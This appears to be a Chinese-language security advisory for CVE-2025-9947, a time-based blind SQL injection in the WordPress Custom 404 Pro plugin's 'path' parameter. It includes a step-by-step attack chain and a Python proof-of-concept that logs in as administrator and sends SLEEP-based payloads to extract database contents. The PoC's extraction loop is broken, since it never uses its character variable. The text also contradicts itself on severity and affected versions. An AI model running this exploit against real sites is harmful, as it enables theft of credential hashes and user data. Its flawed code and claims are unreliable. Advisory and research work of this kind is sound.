WordPress Custom 404 Pro插件path参数SQL注入漏洞(CVE-2025-9947)

漏洞信息

漏洞编号

CVE-2025-9947

漏洞类型

SQL注入（基于时间的盲注）

CVSS评分

4.9 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

WordPress Custom 404 Pro插件

漏洞概述

CVE-2025-9947是WordPress平台上一款名为Custom 404 Pro的插件中存在的高危SQL注入漏洞。该插件主要用于自定义WordPress网站的404错误页面，提升用户体验和SEO效果。然而，在3.12.0及之前的所有版本中，插件对用户通过'path'参数传入的数据处理不当，未能进行充分的输入转义和SQL查询预处理，导致存在基于时间的SQL注入（Time-based Blind SQL Injection）漏洞。

该漏洞由WordPress安全公司Wordfence的安全团队发现并报告，CVSS 3.1评分为4.9分，属于中危级别。尽管评分显示为中危，但漏洞本身的危害程度不容忽视。攻击者需要具备管理员级别（Administrator-level）或更高权限才能利用此漏洞，这一定程度上限制了漏洞的利用范围。然而，在WordPress多用户环境下，一旦攻击者通过其他途径（如弱口令、钓鱼、社会工程等）获得了管理员权限，便可利用此漏洞从数据库中提取敏感信息。

漏洞的CVSS向量表明，攻击者可以通过网络发起攻击（AV:N），攻击复杂度低（AC:L），但需要高权限（PR:H），无需用户交互（UI:N），对机密性影响高（C:H），对完整性和可用性无影响（I:N/A:N）。这意味着漏洞主要用于数据窃取，而非破坏或篡改数据。

此漏洞已在2025年10月11日公开披露，相关的修复版本也已发布。建议所有使用Custom 404 Pro插件的WordPress网站管理员立即检查并更新到最新版本，以消除潜在的安全风险。

技术细节

该漏洞位于Custom 404 Pro插件的admin/Helpers.php文件的第188行附近，涉及对'path'参数的处理。具体技术原理如下：

1. **注入点**：插件在处理用户请求时，将'path'参数直接拼接到SQL查询语句中，未对用户输入进行适当的转义或参数化处理。

2. **利用方式**：攻击者构造恶意的SQL注入payload，通过'path'参数提交。由于缺乏预处理（prepared statements），恶意SQL代码会被数据库引擎直接执行。

3. **时间盲注技术**：漏洞属于基于时间的盲注（Time-based Blind SQL Injection），攻击者无法直接获取查询结果，但可以通过注入如`SLEEP()`或`BENCHMARK()`等时间延迟函数，根据数据库响应时间的长短来逐位推断数据库内容。

4. **权限要求**：由于漏洞位于管理员后台功能中，攻击者需要具备WordPress管理员（Administrator）级别或更高权限才能访问相关页面并触发漏洞。

5. **数据提取**：成功利用后，攻击者可以从数据库中提取包括用户凭据哈希、个人信息、配置数据等敏感信息。

攻击链分析

STEP 1

步骤1：获取管理员权限

攻击者首先需要通过各种手段（如暴力破解、钓鱼、社会工程、购买泄露凭据等）获取目标WordPress网站的管理员（Administrator）级别账号权限。

STEP 2

步骤2：登录WordPress后台

使用获取的管理员凭据登录WordPress管理后台，确保会话有效并具有访问Custom 404 Pro插件管理页面的权限。

STEP 3

步骤3：定位注入点

访问Custom 404 Pro插件相关页面，定位到处理'path'参数的功能接口，确认注入点的存在。

STEP 4

步骤4：构造注入payload

构造基于时间的SQL注入payload，例如使用SLEEP()或BENCHMARK()函数，通过'path'参数提交恶意SQL代码。

STEP 5

步骤5：验证注入

观察服务器响应时间是否出现预期的延迟，确认SQL注入漏洞可被利用。

STEP 6

步骤6：提取敏感数据

通过条件判断结合时间延迟函数，逐字符提取数据库中的敏感信息，如管理员密码哈希、用户数据、配置信息等。

STEP 7

步骤7：利用获取的信息

使用提取到的敏感信息（如密码哈希）进行进一步攻击，如破解管理员密码、访问其他系统或进行横向移动。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-9947 - Custom 404 Pro Time-based SQL Injection PoC
# Vulnerability: Time-based Blind SQL Injection via 'path' parameter
# Affected: Custom 404 Pro <= 3.12.0
# Requirement: Administrator-level access

import requests
import time

# Target configuration
TARGET_URL = "http://target-wordpress-site.com"
ADMIN_USER = "admin"
ADMIN_PASS = "password123"

# Step 1: Login as administrator
session = requests.Session()
login_data = {
    "log": ADMIN_USER,
    "pwd": ADMIN_PASS,
    "wp-submit": "Log In",
    "redirect_to": f"{TARGET_URL}/wp-admin/",
    "testcookie": "1"
}
session.post(f"{TARGET_URL}/wp-login.php", data=login_data)

# Step 2: Time-based SQL Injection payload via 'path' parameter
# The payload uses SLEEP() to test if injection works
# Normal response time vs delayed response indicates successful injection

# Basic time-based injection test
payload = "1' AND (SELECT SLEEP(5))-- -"
injection_url = f"{TARGET_URL}/wp-admin/admin.php"

params = {
    "page": "custom-404-pro",
    "path": payload
}

start_time = time.time()
response = session.get(injection_url, params=params)
elapsed_time = time.time() - start_time

if elapsed_time >= 5:
    print(f"[+] SQL Injection confirmed! Response delayed by {elapsed_time:.2f} seconds")
else:
    print(f"[-] No injection detected. Response time: {elapsed_time:.2f} seconds")

# Step 3: Extract database version using conditional time-based injection
# Example: Extract first character of database version
def extract_data(query, position=1):
    payload = f"1' AND IF(SUBSTRING(({query}),{position},1)=BINARY 0x41,SLEEP(3),0)-- -"
    params["path"] = payload
    start = time.time()
    session.get(injection_url, params=params)
    return time.time() - start

# Extract database version
print("[*] Extracting database version...")
version = ""
for i in range(1, 20):
    found = False
    for c in range(32, 127):
        delay = extract_data("SELECT VERSION()", i)
        if delay >= 3:
            version += chr(c)
            print(f"[+] Found char at position {i}: {chr(c)}")
            found = True
            break
    if not found:
        break

print(f"[+] Database version: {version}")

影响范围

Custom 404 Pro < 3.12.0

Custom 404 Pro <= 3.12.0

防御指南

临时缓解措施

在等待官方修复版本发布期间，建议采取以下临时缓解措施：1）暂时禁用Custom 404 Pro插件，直到确认已升级到安全版本；2）严格限制WordPress管理员账号的访问权限，仅授予可信任用户管理员权限；3）部署Web应用防火墙（WAF），添加针对SQL注入攻击的检测和阻断规则；4）启用WordPress安全审计日志，监控异常的数据库查询活动；5）检查数据库中是否存在异常查询记录，评估是否已遭受攻击；6）考虑修改数据库用户权限，限制WordPress数据库账户的权限范围。